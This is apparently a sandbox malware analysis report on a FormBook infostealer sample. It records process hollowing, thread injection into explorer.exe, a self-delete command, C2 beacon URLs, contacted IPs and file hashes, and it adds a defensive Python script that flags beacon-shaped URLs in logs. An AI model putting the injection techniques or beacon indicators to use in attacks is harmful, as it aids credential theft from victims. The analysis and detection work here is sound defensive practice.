Source: C:\Users\user\Desktop\cryptedprof.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write (2 occurrences)
Source: C:\Users\user\Desktop\cryptedprof.exe Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write (2 occurrences)
Source: C:\Windows\SysWOW64\msdt.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\msdt.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\cryptedprof.exe Thread register set: target process: 3440 (2 occurrences)
Source: C:\Windows\SysWOW64\msdt.exe Thread register set: target process: 3440
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\cryptedprof.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\cryptedprof.exe Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: 180000
Source: C:\Users\user\Desktop\cryptedprof.exe Process created: C:\Users\user\Desktop\cryptedprof.exe 'C:\Users\user\Desktop\cryptedprof.exe'
Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\cryptedprof.exe'
Source: explorer.exe, 00000005.00000000.351832152.00000000083EB000.00000004.00000001.sdmp, msdt.exe, 00000007.00000002.591709948.0000000002F20000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.338761645.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000007.00000002.591709948.0000000002F20000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.338761645.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000007.00000002.591709948.0000000002F20000.00000002.00000001.sdmp Binary or memory string: &Program Manager
Source: explorer.exe, 00000005.00000000.338761645.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000007.00000002.591709948.0000000002F20000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\cryptedprof.exe Code function: 1_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match, file source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: the same 13 memory-dump and unpacked-PE Yara matches listed under Stealing of Sensitive Information (the FormBook rule is mapped to both categories).

Mitre Att&ck Matrix

Matched techniques per tactic (the digits the report attaches to each matched technique are kept as given):

Execution: Native API (1); Shared Modules (1)
Privilege Escalation: Access Token Manipulation (1); Process Injection (512)
Defense Evasion: Rootkit (1); Virtualization/Sandbox Evasion (3); Access Token Manipulation (1); Process Injection (512); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (4); Software Packing (12)
Credential Access: Credential API Hooking (1)
Discovery: Security Software Discovery (131); Virtualization/Sandbox Evasion (3); Process Discovery (3); Remote System Discovery (1); File and Directory Discovery (2); System Information Discovery (13)
Collection: Credential API Hooking (1); Archive Collected Data (1); Clipboard Data (1)
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (13)
Impact: System Shutdown/Reboot (1)
No matched technique: Initial Access, Persistence, Lateral Movement, Exfiltration, Network Effects, Remote Service Effects

Behavior Graph

Behavior Graph ID: 356722, Sample: cryptedprof.exe, Start date: 23/02/2021, Architecture: WINDOWS, Score: 100

Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 5 other signatures

cryptedprof.exe (started)
  dropped: C:\Users\user\AppData\Local\...\System.dll (PE32)
  dropped: C:\Users\user\AppData\Local\Temp\8chdn.dll (PE32)
  signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
  +-- cryptedprof.exe (started)
        signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
        +-- explorer.exe (injected)
              DNS/IP: tabandolano.online 111.221.46.49 port 80 (local port 49753), READYSERVER-SG READYSERVER PTE LTD, Singapore
              DNS/IP: thatlocaljawn.com 34.102.136.180 port 80 (local port 49746), GOOGLE, United States
              DNS/IP: 3 other IPs or domains
              signatures: System process connects to network (likely due to code injection or exploit)
              +-- msdt.exe (started)
                    signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                    +-- cmd.exe (started)
                          +-- conhost.exe (started)


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
cryptedprof.exe | 27% | ReversingLabs | Win32.Trojan.Generic
cryptedprof.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nsl227.tmp\System.dll | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\nsl227.tmp\System.dll | 0% | ReversingLabs |

nsl227.tmp\System.dll is the stock NSIS System plugin, so the clean verdicts are expected: the outer layer of cryptedprof.exe is an NSIS installer (compare the nsis.sf.net/NSIS_Error strings under URLs from Memory and Binaries), and the verdict on the plugin says nothing about the payload it unpacks.

Unpacked PE Files

Source | Detection | Scanner | Label
1.0.cryptedprof.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
1.2.cryptedprof.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
3.0.cryptedprof.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
7.2.msdt.exe.4b9f834.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
3.1.cryptedprof.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
7.2.msdt.exe.4e4cf8.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
3.2.cryptedprof.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.2.cryptedprof.exe.2a60000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://www.tabandolano.online/rcv/?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNvEbOeCI6G9DGd1jjRyJ2sIZ3rQDjWWzUwybw==&jL08l2=WXL00450GFoHk | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.warungsuntik.com/rcv/?VRNh=pIfKS/hEN6BRYAYnpceiijGTuCPe5XtNGOPRhmV5L9BR4RtlzZsfp+6kyczwPilyRouSrFb70A==&jL08l2=WXL00450GFoHk | 0% | Avira URL Cloud | safe
www.warungsuntik.com/rcv/ | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.tabandolano.online/cgi-sys/suspendedpage.cgi?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNv | 0% | Avira URL Cloud | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
tabandolano.online | 111.221.46.49 | true | true | | unknown
thatlocaljawn.com | 34.102.136.180 | true | true | | unknown
www.warungsuntik.com | 168.206.81.138 | true | true | | unknown
www.thatlocaljawn.com | unknown | unknown | true | | unknown
www.tabandolano.online | unknown | unknown | true | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.tabandolano.online/rcv/?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNvEbOeCI6G9DGd1jjRyJ2sIZ3rQDjWWzUwybw==&jL08l2=WXL00450GFoHk | true | Avira URL Cloud: safe | unknown
http://www.warungsuntik.com/rcv/?VRNh=pIfKS/hEN6BRYAYnpceiijGTuCPe5XtNGOPRhmV5L9BR4RtlzZsfp+6kyczwPilyRouSrFb70A==&jL08l2=WXL00450GFoHk | true | Avira URL Cloud: safe | unknown
www.warungsuntik.com/rcv/ | true | Avira URL Cloud: safe | low

The "safe" URL Cloud verdicts are reputation lookups on domains that had no prior history and should not be read as clearing the traffic; the sandbox itself marks all three as malicious because the requests were issued by the injected explorer.exe. The tabandolano.online /cgi-sys/suspendedpage.cgi URL recovered from msdt.exe memory (listed under URLs from Memory and Binaries) is a cPanel-style suspended-account page, so that host had already been taken down by its provider when the beacon was sent.
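Both /rcv/ requests above were issued by explorer.exe, share the trailing jL08l2=WXL00450GFoHk parameter and differ only in the long VRNh value, which has the shape of a base64 blob. The following Python is an added example, not part of the report or of any vendor tooling: it scores URLs from a web-filter log by that shape (short single-directory path, exactly two parameters, a long base64-looking first value and a short alphanumeric second value), pivots on the constant tail parameter across hosts, and separately records hosts answering with a cPanel-style /cgi-sys/suspendedpage.cgi page. The log lines are constructed (the two /rcv/ URLs are copied from the report; the timestamps, client address, process column, status codes and filler requests are invented), and the field layout, path and token length limits are assumptions.

```python
"""Flag FormBook-style "/<dir>/?<k>=<base64 blob>&<k2>=<short token>" beacons in a web-filter log.

Added example, not part of the Joe Sandbox report.  Log lines are constructed; the
field layout (time client process method url status) is an assumed, simplified one.
"""
import base64
import binascii
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote, urlsplit

BASE64_CHARS = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
SHORT_PATH = re.compile(r"^/[A-Za-z0-9_-]{2,8}/$")   # assumption: e.g. /rcv/
SHORT_TOKEN = re.compile(r"^[A-Za-z0-9]{8,24}$")    # assumption: e.g. WXL00450GFoHk
SUSPENDED_PATH = "/cgi-sys/suspendedpage.cgi"         # cPanel suspended-account page

# Constructed log lines; the two /rcv/ URLs are the ones observed in this report.
LOG_LINES = [
    "2021-02-23T15:31:02Z 10.0.0.5 explorer.exe GET http://www.warungsuntik.com/rcv/?VRNh=pIfKS/hEN6BRYAYnpceiijGTuCPe5XtNGOPRhmV5L9BR4RtlzZsfp+6kyczwPilyRouSrFb70A==&jL08l2=WXL00450GFoHk 200",
    "2021-02-23T15:31:09Z 10.0.0.5 explorer.exe GET http://www.tabandolano.online/rcv/?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNvEbOeCI6G9DGd1jjRyJ2sIZ3rQDjWWzUwybw==&jL08l2=WXL00450GFoHk 302",
    "2021-02-23T15:31:09Z 10.0.0.5 explorer.exe GET http://www.tabandolano.online/cgi-sys/suspendedpage.cgi 200",
    "2021-02-23T15:31:15Z 10.0.0.5 chrome.exe GET http://www.apache.org/licenses/LICENSE-2.0 200",
    "2021-02-23T15:31:20Z 10.0.0.5 chrome.exe GET http://www.fontbureau.com/designers/?q=a+b&page=2 200",
]


def split_query(query: str) -> List[Tuple[str, str]]:
    """Split a query string by hand: parse_qsl() would turn '+' into a space and
    corrupt a base64 blob, so only percent-decoding is applied."""
    pairs = []
    for part in query.split("&"):
        if "=" in part:
            key, value = part.split("=", 1)
            pairs.append((unquote(key), unquote(value)))
    return pairs


def looks_base64(value: str, min_len: int = 40) -> bool:
    """True for a long value made only of base64 characters that actually decodes.
    Missing '=' padding is tolerated because some clients strip it."""
    if len(value) < min_len or not BASE64_CHARS.match(value):
        return False
    try:
        base64.b64decode(value + "=" * (-len(value) % 4))
        return True
    except (binascii.Error, ValueError):
        return False


def classify(url: str) -> Optional[Dict[str, object]]:
    """Return beacon attributes when the URL has the observed shape, else None."""
    u = urlsplit(url)
    if u.scheme != "http" or not SHORT_PATH.match(u.path):
        return None
    params = split_query(u.query)
    if len(params) != 2:
        return None
    (_, blob), (_, tail) = params
    if not looks_base64(blob) or not SHORT_TOKEN.match(tail):
        return None
    return {"host": u.hostname, "path": u.path, "tail": tail, "blob_len": len(blob)}


def scan(lines: List[str]) -> Dict[str, object]:
    """Run classify() over log lines; group beacon hosts by the constant tail token."""
    beacons, suspended = [], []
    for line in lines:
        fields = line.split()
        if len(fields) < 6:
            continue
        ts, _client, proc, _method, url, status = fields[:6]
        hit = classify(url)
        if hit:
            hit.update({"time": ts, "process": proc, "status": status})
            beacons.append(hit)
        elif urlsplit(url).path == SUSPENDED_PATH:
            suspended.append(urlsplit(url).hostname)
    by_tail = defaultdict(set)
    for b in beacons:
        by_tail[b["tail"]].add(b["host"])
    return {
        "beacons": beacons,
        "pivots": {tail: sorted(hosts) for tail, hosts in by_tail.items()},
        "suspended": suspended,
    }


if __name__ == "__main__":
    result = scan(LOG_LINES)
    for b in result["beacons"]:
        print(f"{b['time']} {b['process']} -> {b['host']}{b['path']} tail={b['tail']} blob={b['blob_len']}B")
    print("pivots:", result["pivots"])
    print("suspended hosts:", result["suspended"])
```

The pivot on the tail token is the useful output: one run of the implant produced the same token against two different domains, so a hit on a new, unlisted domain with a known token links it to the same infection without needing the domain in a blocklist. The shape rules are deliberately narrow and will miss variants that use longer paths or more parameters; loosen SHORT_PATH and the parameter count with care, since ordinary sites also send base64 in query strings.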

URLs from Memory and Binaries

Unless stated otherwise, the source for every explorer.exe row below is the dump 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmp. The font-vendor and licence URLs it contains (fontbureau.com, tiro.com, sakkal.com, apache.org and similar) are ordinary font and library metadata resident in explorer.exe, not indicators from the sample; the rows that matter for this analysis are the nsis.sf.net strings in cryptedprof.exe and the suspendedpage.cgi URL in msdt.exe.

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000005.00000000.338525692.000000000095C000.00000004.00000020.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe | false | | high
http://www.fontbureau.com | explorer.exe | false | | high
http://www.fontbureau.com/designersG | explorer.exe | false | | high
http://www.fontbureau.com/designers/? | explorer.exe | false | | high
http://www.founder.com.cn/cn/bThe | explorer.exe | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe | false | | high
http://www.tiro.com | explorer.exe | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe | false | | high
http://nsis.sf.net/NSIS_ErrorError | cryptedprof.exe | false | | high
http://www.goodfont.co.kr | explorer.exe | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | explorer.exe | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | explorer.exe | false | URL Reputation: safe | unknown
http://www.typography.netD | explorer.exe | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe | false | | high
http://www.founder.com.cn/cn/cThe | explorer.exe | false | URL Reputation: safe | unknown
http://www.tabandolano.online/cgi-sys/suspendedpage.cgi?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNv | msdt.exe, 00000007.00000002.594068714.000000000508F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe | false | URL Reputation: safe | unknown
http://fontfabrik.com | explorer.exe | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | explorer.exe | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe | false | | high
http://nsis.sf.net/NSIS_Error | cryptedprof.exe | false | | high
http://www.jiyu-kobo.co.jp/ | explorer.exe | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | explorer.exe | false | | high
http://www.fonts.com | explorer.exe | false | | high
http://www.sandoll.co.kr | explorer.exe | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | explorer.exe | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | explorer.exe | false | URL Reputation: safe | unknown
http://www.sakkal.com | explorer.exe | false | URL Reputation: safe | unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
34.102.136.180 | unknown | United States | 15169 | GOOGLE, US | true
111.221.46.49 | unknown | Singapore | 63930 | READYSERVER-SG READYSERVER PTE LTD, SG | true
168.206.81.138 | unknown | South Africa | 137951 | CLAYERLIMITED-AS-AP Clayer Limited, HK | true

                                              General Information

                                              Joe Sandbox Version: 31.0.0 Emerald
                                              Analysis ID: 356722
                                              Start date: 23.02.2021
                                              Start time: 15:29:59
                                              Joe Sandbox Product: CloudBasic
                                              Overall analysis duration: 0h 9m 23s
                                              Hypervisor based Inspection enabled: false
                                              Report type: light
                                              Sample file name: cryptedprof.exe
                                              Cookbook file name: default.jbs
                                              Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of new started processes analysed: 25
                                              Number of new started drivers analysed: 0
                                              Number of existing processes analysed: 0
                                              Number of existing drivers analysed: 0
                                              Number of injected processes analysed: 1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode: default
                                              Analysis stop reason: Timeout
                                              Detection: MAL
                                              Classification: mal100.troj.evad.winEXE@7/4@3/3
                                              EGA Information: Failed
                                              HDC Information:
                                              • Successful, ratio: 27.7% (good quality ratio 25.6%)
                                              • Quality average: 77%
                                              • Quality standard deviation: 29.9%
                                              HCA Information:
                                              • Successful, ratio: 80%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .exe
                                              Warnings:
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                              • Excluded IPs from analysis (whitelisted): 104.43.139.144, 23.211.6.115, 52.255.188.83, 168.61.161.212, 13.64.90.137, 51.104.139.180, 93.184.221.240, 51.103.5.186, 52.155.217.156, 92.122.213.194, 92.122.213.247, 20.54.26.129, 184.30.20.56
                                              • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, wu.azureedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, vip2-par02p.wns.notify.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

                                              Simulations

                                              Behavior and APIs

                                              No simulations

                                              Joe Sandbox View / Context

                                              IPs

                                              Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                              Domains

                                              No context

                                              ASN

                                              Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                              C:\Users\user\AppData\Local\Temp\nsl227.tmp\System.dll
                                              • SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe, Detection: malicious
                                              • QTN3C2AF414EDF9_041873.xlsx, Detection: malicious
                                              • TIC ENQ2040 FCl.xlsx, Detection: malicious
                                              • lpdKSOB78u.exe, Detection: malicious
                                              • jTmBvrBw7V.exe, Detection: malicious
                                              • 523JHfbGM1.exe, Detection: malicious
                                              • TAk8jeG5ob.exe, Detection: malicious
                                              • PAYMENT COPY.exe, Detection: malicious
                                              • ORDER LIST.xlsx, Detection: malicious
                                              • Orderoffer.exe, Detection: malicious
                                              • Our New Order Feb 23 2021 at 2.30_PVV440_PDF.exe, Detection: malicious
                                              • INV_PR2201.docm, Detection: malicious
                                              • CV-JOB REQUEST______PDF.EXE, Detection: malicious
                                              • Request for Quotation.exe, Detection: malicious
                                              • #U007einvoice#U007eSC00978656.xlsx, Detection: malicious
                                              • Purchase Order___pdf ____________.exe, Detection: malicious
                                              • quote.exe, Detection: malicious
                                              • Order83930.exe, Detection: malicious
                                              • Invoice 6500TH21Y5674.exe, Detection: malicious
                                              • Invoice 6500TH21Y5674.exe, Detection: malicious

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Temp\8chdn.dll
                                              Process: C:\Users\user\Desktop\cryptedprof.exe
                                              File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category: dropped
                                              Size (bytes): 11776
                                              Entropy (8bit): 6.515618036223174
                                              Encrypted: false
                                              SSDEEP: 192:BhCyADdd/dsb+YD5JOB+A8nxKJ8c0UWMH0Bi:/4n/+6G9xRU
                                              MD5: F606DDBC12720E77335BB234DE7D3051
                                              SHA1: 806D928CD8C37F1121984CD10DB737260B07B599
                                              SHA-256: 55A8B4D54B2C5D7D5A8B5C2F55C57D5C365D0176F1E44833D17DADA120F4A68C
                                              SHA-512: 0D5921310A2E1C3223422E77CA07263A58E7513A1E60022B26DB1879648A0126B31C96CD02681F8A415CA105FB393BDA330F3807F6388380D2BC6B4D6122CB7B
                                              Malicious: false
                                              Reputation: low
                                              C:\Users\user\AppData\Local\Temp\fhhit.ac
                                              Process: C:\Users\user\Desktop\cryptedprof.exe
                                              File Type: data
                                              Category: dropped
                                              Size (bytes): 185856
                                              Entropy (8bit): 7.999195886882973
                                              Encrypted: true
                                              SSDEEP: 3072:PsU41q9M2FboK24/pOrBMy3LgSLnUZnSAUe+aL8yRvJzF3vY/vH7:0cBpOVMy3cpZnT+aYuJp3vYnH7
                                              MD5: 459E9C75DFA41F95277D89AF36332AD0
                                              SHA1: 959AD4FD57AF69845D537CFD5C0F8E1935F7FD30
                                              SHA-256: 8704B72C6EF206B17353D109FC6D0E7194E50C066C8C6DF8B42F547502C0D9D8
                                              SHA-512: FEBCF2F3869E300F31DF2292D99F957D2ADCE6D62F068477C1CBF61B1390D1ADD42C91669557E13CCA3A596BDE10D619479E17B0115C7AC2A9AD99455F13654B
                                              Malicious: false
                                              Reputation: low
                                              C:\Users\user\AppData\Local\Temp\nsl227.tmp\System.dll
                                              Process: C:\Users\user\Desktop\cryptedprof.exe
                                              File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category: dropped
                                              Size (bytes): 11776
                                              Entropy (8bit): 5.855045165595541
                                              Encrypted: false
                                              SSDEEP: 192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                              MD5: FCCFF8CB7A1067E23FD2E2B63971A8E1
                                              SHA1: 30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                              SHA-256: 6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                              SHA-512: F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                              Malicious: false
                                              Antivirus:
                                              • Antivirus: Metadefender, Detection: 0%
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Reputation: moderate, very likely benign file
                                              C:\Users\user\AppData\Local\Temp\nsq1F7.tmp
                                              Process: C:\Users\user\Desktop\cryptedprof.exe
                                              File Type: data
                                              Category: dropped
                                              Size (bytes): 212876
                                              Entropy (8bit): 7.898845441356521
                                              Encrypted: false
                                              SSDEEP: 3072:gLGYsU41q9M2FboK24/pOrBMy3LgSLnUZnSAUe+aL8yRvJzF3vY/vHSNt:gLGJcBpOVMy3cpZnT+aYuJp3vYnH6t
                                              MD5: 392D17F078932F65177A128DC21CCE8C
                                              SHA1: B7FBFEC205559E2698EA814FCC79CBDAC94E61FE
                                              SHA-256: 3BCA4926EA2A2FCD3A72893AF270033E9DCB8112B6BF24022FE47A7704E5A8B2
                                              SHA-512: 6FC6AB4E4D24D28F96C92B517393404279FFAA9B3B76B93F0BD3A37D27875E6A08F9CAE1AC28313088C041DA7066674FBB6C42D16F000D8B1EB844D7E13BB3BC
                                              Malicious: false
                                              Reputation: low
                                                                                      Preview:

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                      Entropy (8bit):7.1919627087512215
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:cryptedprof.exe
                                                                                      File size:339210
                                                                                      MD5:72efe20e4a59ae2722383b8786956994
                                                                                      SHA1:453b2af3b318668926087556eebfa93eda75d2df
                                                                                      SHA256:d8e0edf1cca3b6edefcd830e233131c593997b5bd4454891dc1b70614862f718
                                                                                      SHA512:3b4c4106d6576ff14419bc9144473e9cc6ef1177dbcd7d9319559fe05563cdf50e9dc62d179464b07d020e98f92da52435e388d3e0e754ca65b14ac0d4e5320e
                                                                                      SSDEEP:6144:111QBRRiKNkBMH1JtudsBnOVMy3cdZnT8aYuJp3v4qzVpwyeLyA:iRtkBMH1ruds5+r3cdZnYalF44VTG
                                                                                      File Content Preview:

                                                                                      File Icon

                                                                                      Icon Hash:70cc8696868ce031

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x403486
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                      Time Stamp:0x5F24D75F [Sat Aug 1 02:45:51 2020 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:ea4e67a31ace1a72683a99b80cf37830

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      sub esp, 00000184h
                                                                                      push ebx
                                                                                      push esi
                                                                                      push edi
                                                                                      xor ebx, ebx
                                                                                      push 00008001h
